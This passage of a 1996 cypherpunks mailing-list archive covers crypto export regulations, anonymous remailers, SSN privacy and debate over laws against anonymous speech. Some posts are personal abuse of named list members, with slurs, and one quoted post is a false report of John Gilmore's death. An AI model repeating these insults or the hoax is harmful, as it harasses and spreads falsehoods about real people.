keep it as brief as possible while still containing my points.  As I said 
in the beginning, I do not really blame Yahoo for this, I think some people 
must have been too flustered in getting the access to power which had
previously been unknown to them, and blamed their confusion and fear of it on
Y(ah)ou.  You might even say the effort was valiant to begin with.  I 
wish I had the resources to purchase a reverse database quarterly in 
order to give it away free (or maybe even ad-sponsored, how else would I pay 
it?) on the web, plus the costs of web hosting, possible legal costs 
etc., but alas, I do not.  I forget what the title of John Markoff's 
article on the closing of Stallman's free account base at ai.mit.edu, so 
I'll just say Au Revoir reverse lookup, I wish I could say I'm waiting 
for your return, but I suspect I shall be seeing more incidents like 
yours in the future.

Dennis Sheil
dennis@gonif.com
http://www.gonif.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 29 Dec 1996 03:58:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Java compilation
Message-ID: <199612290343.VAA15069@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


hi

there was a discussion on this mailing list on whether java
to native code compilers are available now.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

todd@cs.arizona.edu  Todd A. Proebsting at University of Arizona CS Department,

SUBJECT
  "Toba," A Robust Java-to-C Translation System
  New Beta Release of Toba for Linux!

URL
  http://www.cs.arizona.edu/sumatra/toba/

DESCRIPTION

  "Toba" translates Java bytecodes to C.  After being compiled, the
  generated routines link with Toba's run-time system, which includes a
  complete garbage collector, threads interface (Solaris version only),

  and core Java API.

  Toba translates applications (e.g., javac), not applets.  Toba-translated
  applications typically run 3-5 times faster than those interpreted by Sun's
  JDK 1.0.2.  Toba's API does not currently include AWT or dynamic linking.
  The Solaris version of Toba has thread support; the Linux version does
  not.  (Thread support is not needed for many popular Java applications
  like javac.)

PLATFORM
  Solaris, Linux

BODY

Our freely-available distribution includes source code for all of
Toba---we encourage outside porting efforts.  Toba (the translator) is
written in Java.  The run-time system is in C.  Toba uses the freely-
available Boehm-Weiser garbage collector.  The Solaris version uses the
native Solaris threads package.

(We have not used any of Sun's source code--in any way--to develop Toba.
Toba source code is free of all of Sun's licensing restrictions.)

While this is a beta distribution, Toba appears robust.  Because of their
significantly improved performance, we run Toba-compiled versions of javac
(and Toba itself) exclusively for development purposes and have done so
for the last four months.

For more information please visit our website,
        http://www.cs.arizona.edu/sumatra/toba/

Or, simply fetch our distribution and enjoy running your java applications
many times faster:
        ftp://ftp.cs.arizona.edu/sumatra/toba/toba.tar.Z

Toba is part of the larger, on-going "Sumatra" research project at the
Department of Computer Science of The University of Arizona.  The Sumatra
project explores the issues surrounding efficient execution of mobile
code.  For more information about the Sumatra Project, visit our website,
        http://www.cs.arizona.edu/sumatra/

Members of the Sumatra Project:
        Todd A. Proebsting (project leader)
        John H. Hartman
        Gregg M. Townsend
        Patrick Bridges
        Tim Newsham
        Scott A. Watterson


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 29 Dec 1996 04:04:54 -0800 (PST)
To: cryptography@c2.org
Subject: New crypto regs outlaw financing non-US development
Message-ID: <3.0.32.19961228225731.006b3080@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


As you know, the President has transferred most crypto from State to
Commerce. We were all waiting in anticipation for the text of new
regulations to take effect on 12/30/96. Not because we thought that the new
regs will be more favorable to industry and the individual (we know
better), but so we could assess the damage. I will try to give a brief look
at some interesting provisions in the new regs. I assume the reader is
familiar with the carrot and stick (export of single DES and key escrow)
provision of the new regs. IANAL.

This post refers to the text of the regulations available at
http://jya.com/bxa123096.txt and
http://jya.com/itar123096.txt

The above URL's mirror [Federal Register: December 30, 1996 (Volume 61,
Number 251)], also available via
http://www.access.gpo.gov/su_docs/aces/aces140.html

First the good news: the export controls mentioned in the draft of the regs
on any kind of data security software, regardless if it uses crypto or not
did not carry into the final version.

Now to the rest of the news. 

>equests for one-time review of recoverable
>products which allow government officials to obtain, under proper legal
>authority and without the cooperation or knowledge of the user, the
>plaintext of the encrypted data and communications will also receive
>favorable consideration.

The GAK provisions require that the keys are made available without
knowledge of the user. This disqualifies some of the suggested key recovery
schemes alerting the user to the fact that keys are being requested.

>A
>printed book or other printed material setting forth encryption source
>code is not itself subject to the EAR (see Sec. 734.3(b)(2)). However,
>notwithstanding Sec. 734.3(b)(2), encryption source code in electronic
>form or media (e.g., computer diskette or CD ROM) remains subject to
>the EAR (see Sec. 734.3(b)(3)). The administration continues to review
>whether and to what extent scannable encryption source or object code
>in printed form should be subject to the EAR and reserves the option to
>impose export controls on such software for national security and
>foreign policy reasons.

Printed source can still be exported. Source printed in special OCR fonts
will eventually be banned.

Finally, to the big one:
>Sec. 736.2  General prohibitions and determination of applicability.
>
>* * * * *
>    (7) General Prohibition Seven--Support of Certain Activities by
>U.S. persons--(i) Support of Proliferation Activities (U.S. Person
>Proliferation Activity). If you are a U.S. Person as that term is
>defined in Sec. 744.6(c) of the EAR, you may not engage in any
>activities prohibited by Sec. 744.6 (a) or (b) of the EAR which
>prohibits the performance, without a license from BXA, of certain
>financing, contracting, service, support, transportation, freight
>forwarding, or employment that you know will assist in certain
>proliferation activities described further in part 744 of the EAR.
>There are no License Exceptions to this General Prohibition Seven in
>part 740 of the EAR unless specifically authorized in that part.

IMHO, this closes the door on the foreign contracting loophole used by C2
and others. It is now illegal for US persons to finance or contract out
overseas crypto development, since doing so will obviously assist in
proliferation. While not unexpected (I offered a bet on Cypherpunks that
this would happen. Nobody took the bet.), this provision sets a dangerous
precedence. The technical assistance prohibitions of the past have been
transformed into general prohibitions against "financing, contracting,
service, support, transportation, freight forwarding, or employment".

Again, IANAL.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 29 Dec 1996 03:02:31 -0800 (PST)
To: cypherpunks, hugh
Subject: Cypherpunks list spam, down, etc.
Message-ID: <199612291102.DAA25369@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Toad.com filled itself up with email due to the spam attack in the
last few days.  While I was on holiday, Hugh took down the list to
stop the mail loop and restore some sanity.  It worked.  He left it in
a slightly broken state which I'm working to clean up.

If you sent something useful to the list during that time and received
a bounce message, see if your posting comes through by Monday morning.
I'll be excavating and forwarding the posts that I can find.  If I
miss yours, please re-send it (once)!

	John Gilmore
	[continuing to contribute work, in order that you-all may use
	 or abuse the resulting forum]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Sun, 29 Dec 1996 04:36:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Test Only/6:37 AM
Message-ID: <32C6824E.33E2@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 29 Dec 1996 03:46:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crypto Rules (Resend)
Message-ID: <1.5.4.32.19961229114246.0068bae0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal Register: December 30, 1996:
Page 68572-68587

Bureau of Export Administration
 
Encryption Items Transferred From the U.S. Munitions List 
to the Commerce Control List

Summary: This interim rule amends the Export Administration 
Regulations (EAR) by exercising jurisdiction over, and 
imposing new combined national security and foreign policy 
controls on, certain encryption items that were on the United 
States Munitions List, consistent with Executive Order 13026 
and pursuant to the Presidential Memorandum of that date, 
both issued by President Clinton on November 15, 1996.

-----

For full document:

   http://jya.com/bxa123096.txt  (111K)

----------

Federal Register: December 30, 1996:
Page 68633

Amendment to the International Traffic In Arms Regulations

Department of State.

Action: Final rule.

Summary: This rule amends the International Traffic in Arms 
Regulations by removing from the U.S. Munitions List (USML), 
for transfer to the Department of Commerce's Commerce 
Control List (CCL), all cryptographic items except those 
specifically designed, developed, configured, adapted, or 
modified for military applications (including command, 
control and intelligence applications).

-----

For full document:

   http://jya.com/itar123096.txt  (6K)

-----

Or for both, the Federal Register:

   http://www.access.gpo.gov/su_docs/aces/aces140.html

Enter search term: "munitions"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 29 Dec 1996 03:48:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Electronic Surveillance (Resend)
Message-ID: <1.5.4.32.19961229114455.006985b0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've prepared a list of 122 documents on electronic
surveillance selected from the late Office of Technology
Assessment's impressive online archive, 1972-96, with 
links for downloading:

   http://jya.com/esnoop.htm

The selection traces the ascendancy of information
technology over a 25-year period, paralleled by
governmental surveillance technology.

A full listing of the nearly 800 publications of the
OTA archives is at:

   http://jya.com/otapub.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 29 Dec 1996 04:04:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: CAVE Dig Out
Message-ID: <1.5.4.32.19961229120053.00691fa4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


I just re-read John Perry Barlow's 1992 article, "Decrypting 
the Puzzle Palace," and was knocked over by his attack
on TIA's TR45.3 committee and the CAVE algorithm. If 
you've not seen it lately (and Whit Diffie's comments on 
CAVE), I've put it at:

   http://jya.com/puzzle.htm

Inspired by this and John Gilmore's similar attack on TIA
and the TR45.3 gang in a message to me, I've put notices on 
my Web site that I will provide the CAVE algorithm to anyone
who asks (and the TR45.3 document):

   http://jya.com/cave.htm

Analysis of it will determine whether CAVE is as deliberately 
NSA-crippled as Gilmore, Barlow and Diffie claim, and that
the TIA and the TR45.3 "wannabe spooks" committee 
cravenly caved (but, hey, it's never too late to dig out).

Thanks to those who upbraded me for caving too. Digging now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Dec 1996 06:00:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks list spam, down, etc.
In-Reply-To: <199612291102.DAA25369@toad.com>
Message-ID: <73aPZD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Up early, ain't he...

John Gilmore <gnu@toad.com> writes:

> 	John Gilmore
> 	[continuing to contribute work, in order that you-all may use
> 	 or abuse the resulting forum]

I suppose John's hard work moderating, pulling plugs, suppressind dissent, and
shilling for the NSA, is appreciated by his fellow "cypher punk" cocksuckers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 29 Dec 1996 05:58:58 -0800 (PST)
To: Jazzmin Belle Sommers <cypherpunks@toad.com
Subject: Re: ssn hack
Message-ID: <3.0.1.32.19691231190000.00689794@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:10 PM 12/28/96 -0600, Jazzmin Belle Sommers wrote:
>heh.
>
>This was so simple, it still confounds me.
>
>I was asked for my social security number whilst writing a check last night
>(my driver license doesn't have it on there).  I just said, "oh, I don't
>have one, I'm not a citizen."
>
>She bought it!  I got asked where I belonged to, so I said Germany (not
>actually a lie, it's my heritage).  Next time I think I'll say Belgium.

Those with straight American accents might like to claim to be Canadians.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 29 Dec 1996 11:39:30 -0800 (PST)
To: admin@veracruz.net
Subject: Re: With my deepest regards....
In-Reply-To: <19961228093152972.AAA292@monalisa>
Message-ID: <32C6AECC.20D3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Breaux wrote:
> I am withdrawing from this list. Not because of the volume of
> email...that I can deal with...but what I cannot deal with is the
> volume of garbage and egotistical ranting that seems so prevalent in
> what should for all sakes and purposes be a discussion of cyphering
> and security. Apparently the name of this list is designed to
> mislead...because of all the posts, a grand total of 5% proved worth
> reading at all.

Note to cypherpunks:  This guy complains about the problem, but he *is*
the problem.  *He* wants to tell us *he's* leaving.  Talk about ego-
tistical ranting!  What a hypocrite.

BTW, 5% is a pretty good percentage in my book.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 29 Dec 1996 08:32:20 -0800 (PST)
To: jazzmin@ou.edu (Jazzmin Belle Sommers)
Subject: Re: ssn hack
In-Reply-To: <32c5d3216ed5002@cliff.ou.edu>
Message-ID: <199612291624.KAA19081@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jazzmin Belle Sommers wrote:
> This was so simple, it still confounds me.
> 
> I was asked for my social security number whilst writing a check last night
> (my driver license doesn't have it on there).  I just said, "oh, I don't
> have one, I'm not a citizen."
> 
> She bought it!  I got asked where I belonged to, so I said Germany (not
> actually a lie, it's my heritage).  Next time I think I'll say Belgium.
> What's that itty bitty country between France and Spain?  Angorra?  Yeah.
> That's it.

In a similar situation, I once simply refused to give it out: I said
that according to law I do not have to tell it.

That was it.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 10:54:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Structuring" of Communications a Felony?
In-Reply-To: <3.0.32.19961228225731.006b3080@netcom13.netcom.com>
Message-ID: <v03007800aeec658bd4db@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:57 PM -0800 12/28/96, Lucky Green wrote:

>IMHO, this closes the door on the foreign contracting loophole used by C2
>and others. It is now illegal for US persons to finance or contract out
>overseas crypto development, since doing so will obviously assist in
>proliferation. While not unexpected (I offered a bet on Cypherpunks that
>this would happen. Nobody took the bet.), this provision sets a dangerous
>precedence. The technical assistance prohibitions of the past have been
>transformed into general prohibitions against "financing, contracting,
>service, support, transportation, freight forwarding, or employment".
>
>Again, IANAL.

Nor am I, but I have a "prediction" to make in the spirit of Lucky's types
of predictions of doom.

I predict that we will see within two years a law making it illegal to
"structure communications" with the intent to avoid traceability,
accountability, etc.

This would be along the lines of the laws making it illegal to "structure"
financial transactions with the (apparent) intent to avoid or evade certain
laws about reporting of income, reporting of transactions, etc.

As I was wading through the 500 accumulated Cypherpunks messages upon my
return, and after I discarded hundreds of spam and loop messages, and all
of the Vulisgrams--and about 50 others my filter kicked into the trash--I
was struck by the discussion by our former Federal prosecutor, Brian Davis,
about a "structuring" case he personally handled--the gambling lawyer
("IANAL--not") who arranged to receive his winnings as three separate $9000
checks. He paid all of his taxes, perhaps because he was alerted to the
invwestigation, but he nevertheless paid them. And yet, as Brian notes, he
forfeited the $27,000 in income. (Brian has noted that the guy voluntarily
agreed to this outcome, to avoid a court battle. The effect is that he lost
his income for the crime of structuring transactions, not for evading
taxes.)

How long before the U.S. Code declares "attempting to obscure or hide the
origin of a communication" to be a felony? That would rule out orninary
mail without return adresses, but I think there are ample signs we're
already moving toward this situation (packages that could be bombs
putatively require ID, talk of the Postal Service handling the citizen-unit
authentication/signature system, etc.).

While this would not stop all uses of remailers, sendmail-type hacks a la
Port 25 obfuscation, and so on, it would give the Feds a powerful tool in
the suppression of remailer networks.

"The operator of Anonymizer.com failed to file adequate "Reports of
Suspicious Communications" with the Internet Regulatory Commission. He has
agreed to settle the case by forfeiting his machines, his office furniture,
and $225,000 in alleged profits from past uses of his remailer service."

The various lawyers on this list may point out flaws in my prediction.
Please do! And there are still workarounds to such laws. But I think the
use of such regulations to "get" those the government wants "got" is a
time-honored strategy in our modern state. As Whit Diffie notes, the War on
Drugs certainly did not stop drug use, but it most assuredly caused
_corporations_ to be pressed into service as de facto drug policy
enforcers. (How, you ask? The threat of forfeiture of corporation-owned
properties if drugs were ever found on them. And the loss of government
business if urine samples were not taken regularly. "Just say no" posters
up in the company cafeterias.)

Similar restrictions on cryptography--including the "suspicious
communications" reporting item discussed here--will have a similar effect:
casual or "underground"  users will of course not be directly affected, but
corporate or institutional users will find their institutions are actings
as the cops. The large corporations will dare not use "rogue" crypto, for
fear of being hit with tax evasion or SEC or FTC charges (think about
it--that undecodable communication using remailer networks could have been
about price-fixing, or collusion). And companies offering anonymizing
services, like the old business model of Community Connexion (C2), will
likely be hit with the "structuring" rules.

This will force strong, unescrowed crypto to the margins, to the
underground. Exactly the desired intent, of course.

You heard it here.

--Tim May




Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Sun, 29 Dec 1996 08:10:51 -0800 (PST)
To: remailer-operators@c2.net
Subject: WinSock temporarily going down
Message-ID: <199612291610.LAA58498@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: remailer-operators@c2.net, cypherpunks@toad.com, jgrasty@gate.net
Date: Sun Dec 29 11:10:08 1996


Due to a glitch that could potentially open the way to serious abuse of the 
remailer, the WinSock remailer is temporarily ceasing operation. We will 
return to seminormal operation when Joey returns to town, probably in a day 
or two. My apologies if this inconveniences anyone.
JMR
WinSock admins


Regards, Jim Ray  <jmr@shopmiami.com>
DNRC Minister of Encryption Advocacy

"In local news, the city of Miami discovered that it was $68
million short and was forced to seriously consider cutting back
such municipal operations as the City Hall Drive-Thru Bribe
Window." -- Dave Barry, 12/29/96

PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMsaX5jUhsGSn1j2pAQHAcQfQxWeTzFsNBnzK3582Tz4Yopq4zzsTL4E2
BIYs0ipNDE9lXxx3ITpHswHJh6W5ueMFrUshGmu7dvkA/NVyib3RxMGZTQi6v3Wt
qBb+89Q6pUJOi9PRC9cuBdHJ+jIP962klkGZ5ir19VWzQ2+R6tel7oMq0zlIJap1
U6bw0xQbxf9hg3RayFvISw0u0xWsHbj0d1oDhE7flihR/8CKAqgmRwtn/1h24EJY
Tpxou04PWVgvDkuciIlYbEgyHtRA/qQj6BSTpa/uL8BfYYvhQ60ZZYDpStnN0FRo
6v92BW7ESvhDg9A3re6KHraMPWFkM8Yt2EO4NLw8ShE2Hg==
=diu+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 29 Dec 1996 08:24:02 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: www.af.mil
Message-ID: <199612291621.LAA00620@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Has been, um, revised.


				 You can
                                learn all
                               about gov't
                               corruption
                               here. Learn
                               the secrets
                                that they
                               don't know
                               want you to
                               know. Well
                                   not 
                              really, I don't
                              have time for
                                  that.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Sun, 29 Dec 1996 11:54:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: [ADMINISTRATIVIUM] PGP
Message-ID: <199612291930.LAA11740@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


The arrival of warm weather is heralded by the pig shit (or 
whatever kind of shit Intel swines have for brains) getting 
soft in Tim C. May's mini-cranium and the resulting green 
slime seeping through his cocaine- and syphilis- damaged nose 
and onto his keyboard.

        )_(
       [@ @] Tim C. May
       |/ \|
        \O/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 29 Dec 1996 09:01:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: John Gilmore, 58, dead of AIDS
In-Reply-To: <199612291445.JAA29174@dhp.com>
Message-ID: <Pine.LNX.3.95.961229115954.9171C-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Dec 1996, Anonymous wrote:

> John Gilmore died of AIDS today in his San Francisco bathhouse, Toad Hall.
> He was 58.
> 

Is this true, or just some bullshit?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 29 Dec 1996 12:22:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: FCC Access Charge Proceeding
Message-ID: <v02140b01aeec7441c3e0@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 29 Dec 1996 10:19:56 -0600
>Reply-To: telecomreg@relay.doit.wisc.edu
>Originator: telecomreg@relay.doit.wisc.edu
>Sender: telecomreg@relay.doit.wisc.edu
>Precedence: bulk
>From: NJF <NJF@commlaw.com>
>To: Multiple recipients of list <telecomreg@relay.doit.wisc.edu>
>Subject: FCC Access Charge Proceeding
>X-Comment: Requests (UNSUBSCRIBE/HELP) to: listserver@relay.doit.wisc.edu
>MIME-Version: 1.0
>Status: U
>
>        I have placed on our Web site at:
>
>        http://www.commlaw.com/pepper/Memos/InfoLaw/access.html
>
>an analysis of the FCC's Notice of Inquiry on whether ISPs should be
>required to pay access charges.  We also have available the full text of
>the NOI (long) for downloading in Word and WordPerfect formats.
>
>        This is an extremely important proceeding for anyone doing business
>online.  If the RBOCs get their way, the cost of connecting to the Net
>could go through the roof.  Pepper & Corazzini is preparing to file
>comments and reply comments on behalf of interested parties. This will
>be a very time-consuming effort as we anticipate voluminous comments to
>be filed by a large number of companies.  We are prepared to file joint
>comments and replies on behalf of companies supporting the present
>policy of exempting ISPs from access charges.  This will enable a large
>number of firms to participate at a nominal cost.  Please contact me if
>you are interested.  And please feel free to circulate this to any list
>that may be relevant.
>
>Neal J. Friedman
>Telecommunications and Information Law
>Pepper & Corazzini, L.L.P.
>1776 K St., N.W.
>Washington, DC 20006
>njf@commlaw.com
>Voice:  202-296-0600  Fax:  202-296-0600
>Web Site:  http://www.commlaw.com
>>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: teralee@hotmail.com
Date: Sun, 29 Dec 1996 11:37:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: New Web Site - Pass It On
Message-ID: <Ready Aim Fire!_12/29/96 12:43:37 PM_teralee@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



There is a new web site for people going to college and needing
financial aid. The site has downloadable software for electronic
filing of the FAFSA for free. There is even software for increasing
your financial aid eligibility. Check it out and pass this message on
if you or someone you know is going to apply for financial aid and
attend college in the United States.

             http://www.procps.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: multi@manybiz.com
Date: Sun, 29 Dec 1996 11:37:05 -0800 (PST)
Subject: Happy New Year!!!
Message-ID: <199612291811.NAA17265@server1.iop.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, 
Please do not flame me, or respond with anger. If you want your name removed,
send a *blank* email with the word REMOVE in the subject field and you will
be permanantly removed from my mailing list. 

*****************************************************************************

Hello friend, as a fellow opportunity seeker, I recently came accross a 
brand new FREE Downline Club that I feel I must share with you.

Its name is the "Auto-Compounder" and we have a state of the art management
team dedicated to insure that everyone who gets involved will succeed.

I'm offering you a FREE instantaneous Web Page, FREE enrollment, and FREE
information to help you get started in promoting your business.  In a few 
weeks, when you have a large downline, you will have the option
to enter an MLM program along with your downline.  This will insure you 
that you will make money right from the start.  Since all this is FREE, you
have nothing to lose but the time it takes to go to my web page and fill out
the online application.  Take a look at it now so you don't waste any time.
In the first month of existence, there have been several thousand people join
the program and there will be thousands more to come. Act now so you don't 
miss out on this incredible opportunity. Getting in a program like this near 
the top can bring you much prosperity and financial success.   Thanks, Tom

  http://www.alliedsystems.com/compounder/TH07746.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 29 Dec 1996 13:33:36 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Structuring" of Communications a Felony?
Message-ID: <v02140b03aeec93ad25a9@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>At 10:57 PM -0800 12/28/96, Lucky Green wrote:
>
>>IMHO, this closes the door on the foreign contracting loophole used by C2
>>and others. It is now illegal for US persons to finance or contract out
>>overseas crypto development, since doing so will obviously assist in
>>proliferation. While not unexpected (I offered a bet on Cypherpunks that
>>this would happen. Nobody took the bet.), this provision sets a dangerous
>>precedence. The technical assistance prohibitions of the past have been
>>transformed into general prohibitions against "financing, contracting,
>>service, support, transportation, freight forwarding, or employment".
>>
>>Again, IANAL.
>
>Nor am I, but I have a "prediction" to make in the spirit of Lucky's types
>of predictions of doom.
>
>I predict that we will see within two years a law making it illegal to
>"structure communications" with the intent to avoid traceability,
>accountability, etc.
>
>This would be along the lines of the laws making it illegal to "structure"
>financial transactions with the (apparent) intent to avoid or evade certain
>laws about reporting of income, reporting of transactions, etc.
>
[snip]
>
>How long before the U.S. Code declares "attempting to obscure or hide the
>origin of a communication" to be a felony? That would rule out orninary
>mail without return adresses, but I think there are ample signs we're
>already moving toward this situation (packages that could be bombs
>putatively require ID, talk of the Postal Service handling the citizen-unit
>authentication/signature system, etc.).
>
[snip]
>You heard it here.
>
>--Tim May

Tim, I think that this is highly unlikely.  The SC has ruled repeatedly
that anonymous speech is a foundation of American politics (e.g., the
Federalist Papers).

Care to make this prediction a bet?

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jlucas4@capital.edu (Jesse Lucas)
Date: Sun, 29 Dec 1996 10:54:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: anon.penet.fi...
Message-ID: <9612291841.AA00673@athena.capital.edu>
MIME-Version: 1.0
Content-Type: text/plain



   Can anyone tell me the story of the demise of penet.fi?  I came on the scene
right after it shutdown and never got to use the service, or see the site.  

oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo
o  )\     _. - ._.) = Jesse Lucas - jlucas4@capital.edu  	      o 
1 /. `- '  (  `--'  : http://www.geocites.com/collegepark/7332        1
1 `- , ) -  > ) \   : "I cut off their heads and, like heaps of grain,1
o   (.' \) (.' -.   =  I piled them up." - Assyrian Ruler	      o
oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo oo1oo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 14:01:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <v02140b03aeec93ad25a9@[10.0.2.15]>
Message-ID: <v03007800aeec96b09112@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:35 PM -0800 12/29/96, Steve Schear wrote:

>Tim, I think that this is highly unlikely.  The SC has ruled repeatedly
>that anonymous speech is a foundation of American politics (e.g., the
>Federalist Papers).
>
>Care to make this prediction a bet?

Unlike Sandy, I'm not a great believer in multi-year bets as an
epistemological tool....

As to the "anonymous speech" rulings, I mainly know of the 1956 Georgia
case, in which the Supremes struck down a law requiring that leaflets
handed out have a name attached. I don't know of more recent rulings,
especially ones related to the Internet.

(Why this is important is that the Supreme Court has often differentiated
between types of speech. For example, ask a liquor or tobacco company if it
has "freedom of speech." Ask those who put labels on their products if they
have freedom of speech--the Federal Trade Commission, Food and Drug
Administration, etc., declare what may not be said, what must be said, etc.
First Amendment scholars are of course well aware that the First is not
treated as an absolute.)

If origin-labelling is unconstitutional, as Steve claims, then on what
basis can the U.S. Postal Service require identification for packages over
one pound? Surely what is inside the package may be considered "speech" (by
those interested in pushing the point).

And there are many other situations where anonymity is no longer allowed,
where once it was. The gambling example Brian Davis brought up is an
example: for the purposes of tax collection, regulation of gambling, etc.,
winners of nontrivial amounts must identify themselves. (This example shows
that various governmental practices--tax collection, regulation of
substances, regulation of markets, etc.--can be used to trump what were
once considered to be basic freedoms...the freedom to spend money
anonymously, the freedom to travel anonymously, the freedom to not have tax
collectors enter one's house and inspect one's papers, and so on, are no
longer considered to be freedoms.)

As to how such regulations about origin-labeling might develop, here are
several points:

1. A sharp increase in spamming, mass mailing, threatening letters,
etc....sort of like the "denial of service" and spamming/looping attacks
seen here on Cypherpunks, and being seen widely on the Net. This will
increase pressure to "do something about it." A Senator Exon type person
will introduce legislation to require e-mail be labelled.

2. As the Four Horsemen ride, as death threats are delivered anonymously
(as has already happened), further calls will be made for requiring I.D. of
packets. At the least, remailer services will be required to "escrow" the
identities of senders. (The Church of Scientology is a situation to
consider...they were able to force Julf to reveal a pseudonym-true name
mapping, and I expect more such cases...Europe will probably evolve quickly
to a system where pseudonyms will be permitted, providing an "identity
escrow" data base is inspectable by law enforcement and interested parties
in legal cases.)

Such identity escrow in remailer networks would of course put an end to
chaining of remailers.

